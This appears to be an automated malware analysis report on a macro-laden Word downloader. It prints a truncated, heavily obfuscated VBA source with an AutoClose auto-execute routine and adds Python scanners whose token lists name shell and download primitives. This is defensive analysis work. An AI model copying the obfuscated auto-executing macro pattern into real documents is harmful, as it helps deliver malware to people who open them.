Verdict: MALICIOUS (Risk Score 222)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious OLE Word document carrying a VBA project. The macro runs from the AutoClose auto-execution entry point, which Word fires when the document is closed, so a victim who opens, reads and closes the file triggers it without any further interaction. It calls GetObject, which instantiates a COM object from a moniker string and is a common step toward code execution. ClamAV identifies the file as Doc.Downloader.Valyria-6595163-0, a downloader signature, so its primary function is most likely to fetch and execute a second-stage payload. The bulk of the recovered source is padding (assignments to names that are never read, Rnd/Log/Exp/InStr calls whose results are discarded, loops and conditionals with no effect) intended to dilute signatures and slow analysis. Macro-bearing Office documents of this kind are typically delivered as spearphishing attachments (T1566.001).
Heuristics (7)

- critical: CLAMAV_DETECTION. ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
- medium: OLE_VBA_MACROS (3 related findings). Document contains VBA macro code
- high: OLE_VBA_AUTOCLOSE. Auto_Close macro (the recovered source defines `Sub AutoClose()`, the Word spelling of this entry point)
- high: OLE_VBA_GETOBJ. GetObject call
- high: OLE_VBA_PCODE_AUTOEXEC_EXEC. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- medium: OLE_LEGACY_WORDBASIC_AUTOEXEC. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (The "no modern VBA project was recovered" wording conflicts with the 84,405-byte VBA source extracted below; read this finding as a legacy marker hit, not as a statement that the document lacks a VBA project.)
- info: EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML namespace URI embedded in Office content and is not a network indicator.
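The OLE_VBA_PCODE_AUTOEXEC_EXEC finding above describes the logic applied when no VBA source can be decompressed: look for an auto-execution token alongside an execution or download token in the raw compiled p-code or cache streams. The Python below is an added illustration of that logic and is not the analyzer's own code; the token lists, the stream bytes and the verdict strings other than the finding name are assumptions constructed for the example. Identifiers in these streams can be stored as 8-bit text or as UTF-16LE, so both encodings are searched case-insensitively.

```python
import re

# Entry points Office runs without a click, in Word, Excel and VBA-event spellings (assumed list).
AUTOEXEC_TOKENS = ["AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit", "Auto_Open",
                   "Auto_Close", "Document_Open", "Document_Close", "Document_New",
                   "Workbook_Open", "Workbook_BeforeClose"]
# Primitives that let a macro launch or fetch something (assumed list).
EXEC_TOKENS = ["GetObject", "CreateObject", "Shell", "WScript.Shell", "URLDownloadToFile",
               "XMLHTTP", "ADODB.Stream", "Environ", "powershell", "CallByName"]


def patterns(token):
    """Case-insensitive byte regexes for one identifier in 8-bit and UTF-16LE form."""
    raw = token.encode("latin-1")
    wide = b"".join(re.escape(bytes([c])) + b"\x00" for c in raw)
    return (("8bit", re.compile(re.escape(raw), re.IGNORECASE)),
            ("utf16le", re.compile(wide, re.IGNORECASE)))


def scan_stream(blob):
    """Return {"autoexec": [(token, encoding, offset), ...], "exec": [...]} for a raw stream."""
    hits = {"autoexec": [], "exec": []}
    for label, tokens in (("autoexec", AUTOEXEC_TOKENS), ("exec", EXEC_TOKENS)):
        for tok in tokens:
            for enc, pat in patterns(tok):
                hits[label].extend((tok, enc, m.start()) for m in pat.finditer(blob))
    return hits


def classify(hits):
    """Collapse the hit lists into the verdict the heuristic would emit."""
    if hits["autoexec"] and hits["exec"]:
        return "OLE_VBA_PCODE_AUTOEXEC_EXEC"   # runs on open/close and can launch or download
    if hits["autoexec"]:
        return "autoexec-only"                 # runs by itself but no loader primitive seen
    if hits["exec"]:
        return "exec-only"                     # has a primitive but nothing visible triggers it
    return "clean"


# Constructed stand-in for a module or __SRP_ cache stream: an 8-bit "AutoClose"
# identifier and a UTF-16LE "GetObject" identifier among filler bytes.
SAMPLE_STREAM = (b"\x01\x00\x00\x00ThisDocument\x00" + b"AutoClose\x00" + b"\xff\xfe"
                 + "GetObject".encode("utf-16-le") + b"\x00\x00\x1f\x40")
# Constructed stream from a macro that only does arithmetic: no verdict.
BENIGN_STREAM = b"Sub Main()\x00Dim x\x00x = Rnd(1)\x00End Sub\x00"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        hits = scan_stream(blob)
        print(name, classify(hits), hits)
```

Run `scan_stream` over the module streams under `VBA/`, the `_VBA_PROJECT` stream and any `__SRP_*` streams of the OLE container (the `olefile` library lists them). Matching is deliberately loose: a random identifier that happens to contain "shell" will hit, which is acceptable for triage but means the result is evidence for an analyst, not a detection on its own.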
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 84405 bytes | 9caf581e2b2dbd95063962b0b37f9c60569a0e58a1149d76a6460204eb3c49f6 |
Script preview: first 1,000 lines of the extracted macros.bas
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TRogowUggeCUB()
Debug.Print "quzuTutIHEV"
Dim qEpiFupcUdATiKUQacexiQE
qEpiFupcUdATiKUQacexiQE = Log(4)
qEpiFupcUdATiKUQacexiQE = qEpiFupcUdATiKUQacexiQE + Log(13)
Dim GoPeUxoMirhyvuduzyXuX
GoPeUxoMirhyvuduzyXuX = Rnd(112)
If GoPeUxoMirhyvuduzyXuX > 35824 Then
GoPeUxoMirhyvuduzyXuX = Exp(2)
End If
HUmixucynUsAxkuQOafy = 17431
Dim LEDEKOPYNuw
qiNitorAtUw = 57399
HIDEDuQyVazAkYX = InStr("nAriByCoFeXYxum", "nAriByCoFeXYxumnAriByCoFeXYxum")
LEDEKOPYNuw = Rnd(113)
Dim NoxiDOzUsOHu
NoxiDOzUsOHu = Rnd(1210)
If NoxiDOzUsOHu > 64484 Then
NoxiDOzUsOHu = Exp(10)
End If
If LEDEKOPYNuw > 45424 Then
jAxzYNoMIwIw = InStr("pIcAHOsUMAcitUT", "pIcAHOsUMAcitUTpIcAHOsUMAcitUT")
QuKHlUGazgymObibYt = 57721
LEDEKOPYNuw = Exp(3)
vYmevyVySWezEvYBOzAJem = InStr("jiSUToGIliojeKIMUr", "jiSUToGIliojeKIMUrjiSUToGIliojeKIMUr")
zakORadYmixei = 44345
End If
PIvexquairiheFytuCONc = Val("8537.7") & "FYvoZeXEWASIXIC"
bEWediuWaNePiwU = Val("96741.8") & "qizyfytOLydYDINIVU"
Dim UtYRyNaCEhYvuPOvILoH
UtYRyNaCEhYvuPOvILoH = Rnd(136)
If UtYRyNaCEhYvuPOvILoH > 13397 Then
UtYRyNaCEhYvuPOvILoH = Exp(6)
End If
Dim pObeTuLoHxIxENEsIheZAH
For pObeTuLoHxIxENEsIheZAH = 7 To 13
bOZyZuWyPYsAiqecETE = Val("93980.6") & "cuqUdaTEbisuHuGE"
Dim wuaaBIGEgoSXaqlUrAq
wuaaBIGEgoSXaqlUrAq = Fix(49017)
Dim JyxebyZuziJIZ
JyxebyZuziJIZ = Log(7)
JyxebyZuziJIZ = JyxebyZuziJIZ + Log(13)
Dim QufoMuZYGIvegoV
QufoMuZYGIvegoV = Rnd(135)
If QufoMuZYGIvegoV > 63765 Then
QufoMuZYGIvegoV = Exp(5)
End If
Next
kiiAxadizAvYsypYaPaZe = InStr("rOgUlYzIaeTEQUPIXfId", "rOgUlYzIaeTEQUPIXfIdrOgUlYzIaeTEQUPIXfId")
Dim bIDefoRYLeaesImi
For bIDefoRYLeaesImi = 2 To 12
Dim ZAZOlAaCinufatrIZUBUHo
ZAZOlAaCinufatrIZUBUHo = Fix(76244)
Next
xYHiQogyKuGgUnAcuN = Val("60251.10") & "VYMyHuZudesIxAwIJIwA"
Dim namyiODTfUkabA
namyiODTfUkabA = Log(6)
namyiODTfUkabA = namyiODTfUkabA + Log(10)
ZEtusyXOcAMUNUFea = 98457
End Sub
Sub AutoClose()
SeRahOluiINUwOzuX = Val("92360.4") & "kEnoBohunEmYW"
Dim XIDuxilUSaRYiiaoHIz
For XIDuxilUSaRYiiaoHIz = 8 To 11
Dim fURAiUleaOMaMetAX
fURAiUleaOMaMetAX = Fix(94668)
Next
Dim vYMoROQuCeneDyV
vYMoROQuCeneDyV = Log(4)
bEVUjOGOJajO = InStr("BIXOpUlIKepYB", "BIXOpUlIKepYBBIXOpUlIKepYB")
ZixisyHexiVoiumOw = Val("506.7") & "hoFeDEpygeLAzUSyVavAmib"
vYMoROQuCeneDyV = vYMoROQuCeneDyV + Log(11)
On Error Resume Next
LibywUQyTyL = Val("62944.8") & "qikYbwAsysOSEiegIGE"
Dim opEtAGYLYx
For opEtAGYLYx = 7 To 12
Dim tesosiPygyTEKaHAxOfa
tesosiPygyTEKaHAxOfa = Fix(80502)
Next
Dim kUkANOFuNehIqHypEJyRidA
WIbuHacuPYtaSE = Val("44302.6") & "aiBYpyqYioLAjewyDEPyTUn"
Dim BAferZYVazEkiNjuRaBY
BAferZYVazEkiNjuRaBY = Log(6)
BAferZYVazEkiNjuRaBY = BAferZYVazEkiNjuRaBY + Log(12)
kUkANOFuNehIqHypEJyRidA = Log(8)
kUkANOFuNehIqHypEJyRidA = kUkANOFuNehIqHypEJyRidA + Log(10)
Debug.Print "JYJESabUwaCudYvoL"
Dim ZiPalujopuDeVSE
For ZiPalujopuDeVSE = 1 To 13
Dim FYfyQeXyMIX
FYfyQeXyMIX = Fix(36647)
Next
Dim kuoPehiZidYf
kuoPehiZidYf = Rnd(124)
If kuoPehiZidYf > 8670 Then
kuoPehiZidYf = Exp(4)
End If
OsoDamlurIzyLeriLeR = InStr("YLeZixoSYmfePIT", "YLeZixoSYmfePITYLeZixoSYmfePIT")
hEGAluFeayrAJ = InStr("gyteFYtErAzOwSeBU", "gyteFYtErAzOwSeBUgyteFYtErAzOwSeBU")
vaXilAWiCyTuSOQuJepIcusA = InStr("HIiUdEFiYDuVUXIKAwoMIJ", "HIiUdEFiYDuVUXIKAwoMIJHIiUdEFiYDuVUXIKAwoMIJ")
Dim RoGEMATozUkiG
For RoGEMATozUkiG = 2 To 11
Dim HIwamiMYrosypeNYC
HIwamiMYrosypeNYC = Fix(6751)
Next
xoSESEkErmiQHevY = vbNullString
Dim laPUDinYQEp
laPUDinYQEp = Log(1)
laPUDinYQEp = laPUDinYQEp + Log(13)
Debug.Print "xazYkYnmIZuJaEcosubI"
Dim TuHeFyJfyHaHibyaEPOl
LozUwurOgipY = Val("11561.9") & "tULyxafOBeLadEWig"
joYvALkUvEKiWExol = InStr("NuNOhVYcIcUVAKegEfo", "NuNOhVYcIcUVAKegEfo
... (truncated)
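Almost everything in the preview is padding: assignments to names that nothing reads, Rnd/Log/Exp/Fix/InStr calls whose results are discarded, and loops and If blocks with no effect. The Python below is an added example, not code from the page or from the analyzer, of stripping that padding so the few meaningful statements in `AutoClose` stand out. A name is treated as padding only when every value assigned to it is built from literals and side-effect-free built-ins and no statement that does anything else ever reads it; a statement mentioning an execution token is never removed. The VBA it runs on is constructed in the same style, its GetObject line is a stand-in for the real call (which the truncated preview does not show), and the built-in and token lists are assumptions.

```python
import re
from collections import namedtuple

# Side-effect-free built-ins the padding leans on (assumed list); their results never matter.
JUNK_FUNCS = {"rnd", "log", "exp", "fix", "int", "val", "instr", "abs", "sqr", "len", "chr"}
KEYWORDS = {"and", "or", "not", "xor", "mod", "is", "like", "to", "step", "then", "else", "true", "false", "vbnullstring", "set", "let", "new", "as", "on", "error", "resume", "next"}
EXEC_TOKENS = ("getobject", "createobject", "shell", "wscript", "environ", "urldownloadtofile", "xmlhttp", "adodb.stream", "powershell")
OPENERS = {"sub": "endsub", "for": "next", "if": "endif"}
STRING_RE, IDENT_RE = re.compile(r'"[^"]*"'), re.compile(r"[A-Za-z_][\w.]*")

# raw text, kind (dim|assign|for|if|debug|next|endif|sub|endsub|other), name defined,
# frozenset of names read, and whether an execution token appears (never padding).
Stmt = namedtuple("Stmt", "raw kind var idents exec_hit")


def idents_in(expr):
    """Variable-like names in an expression, minus built-ins and keywords (string literals blanked)."""
    return frozenset({m.lower() for m in IDENT_RE.findall(STRING_RE.sub('""', expr))} - JUNK_FUNCS - KEYWORDS)


def parse(line):
    s = line.strip()
    low = s.lower()
    hit = any(t in low for t in EXEC_TOKENS)
    if m := re.match(r"dim\s+(\w+)", s, re.I):
        return Stmt(s, "dim", m.group(1).lower(), frozenset(), hit)
    for kind, pat in (("debug", r"debug\.print"), ("endif", r"end if$"), ("next", r"next\b"),
                      ("endsub", r"end (sub|function)$"), ("sub", r"(private |public )?(sub|function) ")):
        if re.match(pat, low):
            return Stmt(s, kind, None, frozenset(), hit)
    if m := re.match(r"for\s+(\w+)\s*=\s*(.*)", s, re.I):
        return Stmt(s, "for", m.group(1).lower(), idents_in(m.group(2)), hit)
    if m := re.match(r"if\s+(.*)\s+then$", s, re.I):
        return Stmt(s, "if", None, idents_in(m.group(1)), hit)
    if m := re.match(r"(?:set\s+)?(\w+)\s*=\s*(.*)", s, re.I):
        return Stmt(s, "assign", m.group(1).lower(), idents_in(m.group(2)), hit)
    return Stmt(s, "other", None, idents_in(s), hit)


def match_blocks(stmts):
    """Opener index -> closer index (len(stmts) when truncation cut the block off)."""
    close, stack = {}, []
    for i, st in enumerate(stmts):
        if st.kind in OPENERS:
            stack.append(i)
        elif stack and st.kind == OPENERS[stmts[stack[-1]].kind]:
            close[stack.pop()] = i
    return {**close, **{i: len(stmts) for i in stack}}


def junkish(i, stmts, close, cands):
    """True if statement i (for If/For: including its whole body) is padding under `cands`."""
    st = stmts[i]
    if st.exec_hit or st.kind not in ("dim", "debug", "assign", "for", "if"):
        return False
    if (st.var and st.var not in cands) or not st.idents <= cands:
        return False
    j = i + 1
    while st.kind in OPENERS and j < close[i]:      # only If/For have a body to check
        if not junkish(j, stmts, close, cands):
            return False
        j = close[j] + 1 if stmts[j].kind in OPENERS else j + 1
    return True


def strip_junk(src):
    stmts = [parse(l) for l in src.splitlines() if l.strip()]
    close = match_blocks(stmts)
    cands = {st.var for st in stmts if st.var}   # every defined name starts out as a suspect
    while True:                                   # fixed point: names read by real code are real
        doomed = set()
        for i, st in enumerate(stmts):
            if not junkish(i, stmts, close, cands):
                doomed |= (st.idents | {st.var}) & cands
        if not doomed:
            break
        cands -= doomed
    kept, i = [], 0
    while i < len(stmts):
        if junkish(i, stmts, close, cands):       # skip one padding statement or a whole block
            i = close[i] + 1 if stmts[i].kind in OPENERS else i + 1
        else:
            kept.append(stmts[i].raw)
            i += 1
    return "\n".join(kept)


# Constructed VBA in the style of the recovered macro; the GetObject line is a
# stand-in for the real call, which the truncated preview does not show.
SAMPLE = """\
Sub AutoClose()
Debug.Print "quzu"
Dim qEpi
qEpi = Log(4)
qEpi = qEpi + Log(13)
GoPe = Rnd(112)
If GoPe > 35824 Then
GoPe = Exp(2)
End If
For pObe = 7 To 13
wuaa = Fix(49017)
Next
SeRah = Val("92360.4") & "kEno"
On Error Resume Next
target = "moniker" & "-placeholder"
Set svc = GetObject(target)
End Sub
"""
```

Run `strip_junk` over the full macros.bas dump. A name survives if any statement that does real work reads it, so the argument to a GetObject or Shell call, or a variable tested by an If whose body contains one, is kept along with its assignments. `Else` branches, `For Each` loops and single-line `If ... Then stmt` forms are treated as real code and left untouched, which errs on the side of keeping too much rather than hiding a payload line.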